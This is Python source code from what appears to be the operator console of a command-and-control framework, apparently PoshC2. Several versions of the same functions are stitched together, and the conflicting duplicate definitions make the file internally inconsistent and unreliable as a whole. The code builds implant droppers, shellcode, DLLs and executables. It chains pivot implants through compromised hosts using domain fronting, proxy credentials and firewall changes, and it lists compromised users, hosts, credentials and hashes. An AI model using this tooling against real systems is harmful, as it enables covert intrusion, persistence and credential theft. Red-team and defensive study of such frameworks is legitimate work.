def do_get_opsec_events(user, command):
events = get_opsec_events()
if events:
eventsformatted = "ID Date Owner Event Note \n"
for i in events:
eventsformatted += "%s %s %s %s %s \n" % (i[0], i[1], i[2],
i[3], i[4])
print_good(eventsformatted)
input("Press Enter to continue...")
clear()
def do_add_autorun(user, command):
if command == "add-autorun":
print_bad("Please specify a module to autorun")
return
autorun = command.replace("add-autorun ", "")
autorun = autorun.replace("add-autorun", "")
add_autorun(autorun)
print_good("add-autorun: %s\r\n" % autorun)
input("Press Enter to continue...")
clear()
def do_set_killdate(user, command):
new_killdate = command.replace("set-killdate ", "")
new_killdate = new_killdate.replace("set-killdate", "").strip()
if not validate_killdate(new_killdate):
print_bad("Invalid killdate format, please specify a killdate in format yyyy-MM-dd")
else:
update_item("KillDate", "C2Server", new_killdate)
print_good("Updated KillDate (Remember to generate new payloads and get new implants): %s\r\n" % new_killdate)
input("Press Enter to continue...")
clear()
def do_set_defaultbeacon(user, command):
new_sleep = command.replace("set-defaultbeacon ", "")
new_sleep = new_sleep.replace("set-defaultbeacon", "")
if not validate_sleep_time(new_sleep):
print_bad("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
else:
update_item("DefaultSleep", "C2Server", new_sleep)
print_good("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
input("Press Enter to continue...")
clear()
def do_createdaisypayload(user, command):
name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
daisyurl = input(f"Daisy URL: e.g. {default_url} ")
if ("http://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
if ("https://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
pbindsecret = PBindSecret
pbindpipename = PBindPipeName
daisyurl, daisyurl_count = string_to_array(daisyurl)
daisyhostheader = ""
c = 0
daisyurls = daisyurl.split(",")
for url in daisyurls:
if c > 0:
daisyhostheader += ",\"\""
else:
daisyhostheader += "\"\""
c += 1
C2 = get_c2server_all()
urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
"", "", "")
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
PowerShellProxyCommand=proxynone,
URLID=urlId,
PBindPipeName=pbindpipename,
PBindSecret=pbindsecret)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (daisyurl),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreateDonutShellcode("%s_" % name)
newPayload.BuildDynamicPayloads("%s_" % name)
print_good("Created new %s daisy payloads" % name)
input("Press Enter to continue...")
clear()
def do_createnewpayload(user, command, creds=None):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
comms_url = input("Comms URL: https://www.example.com ")
domain = (comms_url.lower()).replace('https://', '')
domain = domain.replace('http://', '')
domainfront = input("Domain front hostname: jobs.azureedge.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
randomid = randomuri(5)
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
else:
imurl = get_newimplanturl()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], comms_url, domainfront, C2[8],
proxyuser, proxypass, proxyurl, "", "", C2[17],
C2[18], C2[19], imurl, PayloadsDirectory)
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreatePython("%s_" % name)
newPayload.CreateCS("%s_" % name)
new_urldetails(randomid, comms_url, domainfront, proxyurl, proxyuser,
proxypass, credsexpire)
print_good("Created new payloads")
input("Press Enter to continue...")
clear()
def do_tasks(user, command):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
print_good("No tasks queued!\r\n")
else:
for task in tasks:
imname = get_implantdetails(task[1])
alltasks += "[%s] : %s | %s\r\n" % (imname[0], "%s\\%s" % (imname[11], imname[2]), task[2])
print_good("Queued tasks:\r\n\r\n%s" % alltasks)
input("Press Enter to continue...")
clear()
def do_show_serverinfo(user, command):
C2 = get_c2server_all()
detailsformatted = "\nPayloadCommsHost: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nGET_404_Response: %s\nPoshProjectDirectory: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nPushover_APIToken: %s\nPushover_APIUser: %s\nEnableNotifications: %s\n" % (
C2.PayloadCommsHost, C2.EncKey, C2.DomainFrontHeader, C2.DefaultSleep,
C2.KillDate, C2.GET_404_Response, C2.PoshProjectDirectory,
C2.QuickCommand, C2.DownloadURI, C2.ProxyURL, C2.ProxyUser,
C2.ProxyPass, C2.URLS, C2.SocksURLS, C2.Insecure, C2.UserAgent,
C2.Referrer, C2.Pushover_APIToken, C2.Pushover_APIUser,
C2.EnableNotifications)
print_good(detailsformatted)
input("Press Enter to continue...")
clear()
def do_tasks(user, command):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
print_good("No tasks queued!\r\n")
else:
for task in tasks:
imname = get_implantdetails(task.RandomURI)
alltasks += f"[{imname.ImplantID}] : {imname.Domain}\\{imname.User} | {task.Command} : {task.TaskID}\r\n"
print_good("Queued tasks:\r\n\r\n%s" % alltasks)
input("Press Enter to continue...")
clear()
def do_opsec(user, command):
implants = get_implants_all()
comtasks = get_tasks()
hosts = ""
uploads = ""
urls = get_c2urls()
urlformatted = "ID Name URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
for i in urls:
urlformatted += "%s %s %s %s %s %s %s %s \n" % (
i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7])
users = ""
if implants:
for implant in implants:
if implant.Hostname not in hosts:
hosts += "%s \n" % implant.Hostname
if comtasks:
for task in comtasks:
implant = get_implantdetails(task[1])
command = task[2].lower()
output = task[3].lower()
if implant.User not in users:
users += "%s\\%s @ %s\n" % (implant.Domain, implant.User,
implant.Hostname)
if "invoke-pbind" in command and "connected" in output:
tg = re.search("(?<=-target )\\S*", str(command))
if tg[0] not in hosts:
hosts += "%s \n" % tg[0]
if "uploading file" in command:
uploadedfile = command
uploadedfile = uploadedfile.partition(
"uploading file: ")[2].strip()
filehash = uploadedfile.partition(" with md5sum:")[2].strip()
uploadedfile = uploadedfile.partition(
" with md5sum:")[0].strip()
uploadedfile = uploadedfile.strip('"')
uploads += "%s\t%s\t%s\n" % (implant.User, filehash,
uploadedfile)
if "installing persistence" in output:
line = command.replace('\n', '')
line = line.replace('\r', '')
filenameuploaded = line.rstrip().split(":", 1)[1]
uploads += "%s %s \n" % (implant.User, filenameuploaded)
if "written scf file" in output:
uploads += "%s %s \n" % (implant.User, output)
creds, hashes = parse_creds(get_creds())
print_good(
"\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
% (users, hosts, urlformatted, uploads, creds, hashes))
print_good("\nOpSec Events:")
do_get_opsec_events(user, command)
def do_insert_opsec_events(user, command):
opsec_timestamp_format = "%Y-%m-%d %H:%M"
timestamp_string = datetime.now().strftime(opsec_timestamp_format)
timestamp = input(f"Timestamp: (Press Enter for {timestamp_string}) ").strip()
if not timestamp:
timestamp = timestamp_string
if not validate_timestamp_string(timestamp, opsec_timestamp_format):
print_bad("Please enter a valid timestamp in format yyyy-mm-dd HH:MM")
input("Press Enter to continue...")
clear()
return
event = input("Event: ")
note = input("Notes: ")
insert_opsec_event(timestamp, user, event, note)
print_good("Event added successfully")
do_get_opsec_events(user, command)
def do_opsec(user, command):
implants = get_implants_all()
comtasks = get_tasks()
hosts = ""
uploads = ""
urls = ""
users = ""
for i in implants:
if i[3] not in hosts:
hosts += "%s \n" % i[3]
if i[9] not in urls:
urls += "%s \n" % i[9]
for t in comtasks:
hostname = get_implantdetails(t[1])
command = t[2].lower()
output = t[3].lower()
if hostname[2] not in users:
users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3])
if "invoke-pbind" in command and "connected" in output:
tg = re.search("(?<=-target )\\S*", str(command))
if tg[0] not in hosts:
hosts += "%s \n" % tg[0]
if "uploading file" in command:
uploadedfile = command
uploadedfile = uploadedfile.partition(
"uploading file: ")[2].strip()
filehash = uploadedfile.partition(" with md5sum:")[2].strip()
uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
uploadedfile = uploadedfile.strip('"')
uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile)
if "installing persistence" in output:
implant_details = get_implantdetails(t[2])
line = command.replace('\n', '')
line = line.replace('\r', '')
filenameuploaded = line.rstrip().split(":", 1)[1]
uploads += "%s %s \n" % (implant_details[3], filenameuploaded)
if "written scf file" in output:
implant_details = get_implantdetails(t[2])
uploads += "%s %s\n" % (implant_details[3],
output[output.indexof(':'):])
creds, hashes = parse_creds(get_creds())
print_good(
"\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
% (users, hosts, urls, uploads, creds, hashes))
input("Press Enter to continue...")
clear()
def do_add_hosted_file(user, command):
FilePath = input("File Path: .e.g. /tmp/application.docx: ")
URI = input("URI Path: .e.g. /downloads/2020/application: ")
ContentType = input("Content Type: .e.g. (text/html): ")
if ContentType == "":
ContentType = "text/html"
Base64 = no_yes_prompt("Base64 Encode File")
if not Base64:
Base64 = "No"
else:
Base64 = "Yes"
if not URI or not FilePath:
print_bad("Please enter a FilePath and URI")
input("Press Enter to continue...")
clear()
return
insert_hosted_file(URI, FilePath, ContentType, Base64, "Yes")
FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
print_good("Added hosted-file \n\n%s%s -> %s (%s)\r\n" % (FirstURL, URI, FilePath, ContentType))
do_show_hosted_files(user, command)
clear()
def do_createproxypayload(user, command, creds=None):
params = re.compile("createproxypayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
proxyurl = input(Colours.GREEN +
"Proxy URL: .e.g. http://10.150.10.1:8080 ")
credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
update_item("ProxyURL", "C2Server", proxyurl)
update_item("ProxyUser", "C2Server", proxyuser)
update_item("ProxyPass", "C2Server", proxypass)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13],
C2[11], "", "", C2[19], C2[20], C2[21],
"%s?p" % get_newimplanturl(), PayloadsDirectory)
newPayload.CreateRaw("Proxy")
newPayload.CreateDlls("Proxy")
newPayload.CreateShellcode("Proxy")
newPayload.CreateEXE("Proxy")
newPayload.CreateMsbuild("Proxy")
newPayload.CreateCS("Proxy")
new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass,
credsexpire)
print_good("Created new proxy payloads")
input("Press Enter to continue...")
clear()
def do_creds(user, command):
if "-add " in command:
p = re.compile(r"-domain=([^\s]*)")
domain = re.search(p, command)
if domain:
domain = domain.group(1)
p = re.compile(r"-username=([^\s]*)")
username = re.search(p, command)
if username:
username = username.group(1)
p = re.compile(r"-password=([^\s]*)")
password = re.search(p, command)
if password:
password = password.group(1)
else:
p = re.compile(r"-password=([^\s]*)")
password = re.search(p, command)
if password:
password = password.group(1)
p = re.compile(r"-hash=([^\s]*)")
hash = re.search(p, command)
if hash:
hash = hash.group(1)
if not domain or not username:
print_bad("Please specify a domain and username")
return
if password and hash:
print_bad("Please specify a password or a hash, but not both")
return
if not password and not hash:
print_bad("Please specify either a password or a hash")
return
insert_cred(domain, username, password, hash)
print_good("Credential added successfully")
return
elif "-search " in command:
username = command.replace("creds ", "")
username = username.replace("-search ", "")
username = username.strip()
creds, hashes = parse_creds(get_creds_for_user(username))
print_good("Credentials Compromised: \n%s\nHashes Compromised: \n%s" %
(creds, hashes))
return
else:
creds, hashes = parse_creds(get_creds())
print_good(
"\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" %
(creds, hashes))
def do_cleartasks(user, command):
drop_newtasks()
print_good("Emptied tasks queue\r\n")
input("Press Enter to continue...")
clear()
def do_turnon_notifications(user, command):
update_item("EnableNotifications", "C2Server", "Yes")
print_good("Turned on notifications on new implant")
input("Press Enter to continue...")
clear()
def do_nuke_autoruns(user, command):
del_autoruns()
print_good("nuked autoruns\r\n")
input("Press Enter to continue...")
clear()
def do_del_autorun(user, command):
autorun = command.replace("del-autorun ", "")
del_autorun(autorun)
print_good("deleted autorun\r\n")
input("Press Enter to continue...")
clear()
def do_list_autoruns(user, command):
print_good(get_autorun())
input("Press Enter to continue...")
clear()
def do_startdaisy(user, command, randomuri):
check_module_loaded("invoke-daisychain.ps1", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(
Colours.RED +
"Daisy from an unelevated context can only bind to localhost, continue? y/N "
+ Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " +
Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " +
Colours.END)
firstdaisy = input(Colours.GREEN +
"Is this the first daisy in the chain? Y/n? " +
Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN +
f"C2 URL (leave blank for {default_url}): " +
Colours.END)
domain_front = input(
Colours.GREEN +
f"Domain front header (leave blank for {str(default_df_header)}): "
+ Colours.END)
proxy_user = input(
Colours.GREEN +
"Proxy user (<domain>\\<username>, leave blank if none): " +
Colours.END)
proxy_pass = input(Colours.GREEN +
"Proxy password (leave blank if none): " +
Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " +
Colours.END)
cred_expiry = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN +
"Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " +
Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
if domain_front:
command = command + f" -domfront {domain_front}"
if proxy_url:
command = command + f" -proxyurl '{proxy_url}'"
if proxy_user:
command = command + f" -proxyuser '{proxy_user}'"
if proxy_pass:
command = command + f" -proxypassword '{proxy_pass}'"
if elevated.lower() == "y" or elevated == "":
firewall = input(Colours.GREEN +
"Add firewall rule? (uses netsh.exe) y/N: ")
if firewall.lower() == "n" or firewall == "":
command = command + " -nofwrule"
else:
print_good(
"Not elevated so binding to localhost and not adding firewall rule"
)
command = command + " -localhost"
urls = get_allurls()
command = command + f" -urls '{urls}'"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(
Colours.GREEN +
"Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"",
"\"\"", proxy_url, proxy_user, proxy_pass,
cred_expiry)
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
URLID=urlId,
PowerShellProxyCommand=proxynone)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (upstream_url),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
def do_get_killdate(user, command):
killdate = select_item("KillDate", "C2Server")
print_good(f"KillDate: {killdate}")
input("Press Enter to continue...")
clear()
def do_opsec(user, command):
print_good(get_opsec_string(user, command))
do_get_opsec_events(user, command)
def do_history(user, command):
print_good(get_history())
input("Press Enter to continue...")
clear()
def do_show_serverinfo(user, command):
i = get_c2server_all()
detailsformatted = "\nPayloadCommsHost: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nGET_404_Response: %s\nPoshProjectDirectory: %s\nPayloadCommsPort: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nPushover_APIToken: %s\nPushover_APIUser: %s\nEnableNotifications: %s\n" % (i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18], i[19], i[20], i[21], i[22])
print_good(detailsformatted)
input("Press Enter to continue...")
clear()
def do_help(user, command):
print_good(pre_help)
input("Press Enter to continue...")
clear()
def do_show_serverinfo(user, command):
i = get_c2server_all()
detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s\n" % (i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18], i[19], i[20], i[21], i[22], i[23], i[24])
print_good(detailsformatted)
input("Press Enter to continue...")
clear()
def do_startdaisy(user, command, randomuri):
check_module_loaded("daisy.dll", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {PayloadCommsHost}): " + Colours.END)
if DomainFrontHeader:
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {DomainFrontHeader}): " + Colours.END)
else:
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for configured value of no header): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
if not upstream_url:
upstream_url = PayloadCommsHost
if not domain_front:
domain_front = DomainFrontHeader
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
domain_front = upstream_daisy_host
urls = get_allurls().replace(" ", "")
useragent = UserAgent
command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" \"{upstream_url}\" \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], f"http://{bind_ip}", "", f"{bind_port}", "", "", "",
"", proxynone, C2[17], C2[18], C2[19], "%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
newPayload.CreateCS(name)
new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", upstream_url, daisyhost[0], "")
print_good("Created new %s daisy payloads" % name)
def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
comms_url = input(
"Domain or URL in array format: https://www.example.com,https://www.example2.com "
)
domainfront = input(
"Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net "
)
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")
comms_url, PayloadCommsHostCount = string_to_array(comms_url)
domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
if PayloadCommsHostCount == DomainFrontHeaderCount:
pass
else:
print("[-] Error - different number of host headers and URLs")
input("Press Enter to continue...")
clear()
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
else:
imurl = get_newimplanturl()
C2 = get_c2server_all()
urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser,
proxypass, credsexpire)
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
imurl,
PayloadsDirectory,
URLID=urlId,
PBindPipeName=pbindpipename,
PBindSecret=pbindsecret)
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
if not shellcodeOnly:
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreatePython("%s_" % name)
newPayload.CreateDonutShellcode("%s_" % name)
print_good("Created new payloads")
input("Press Enter to continue...")
clear()
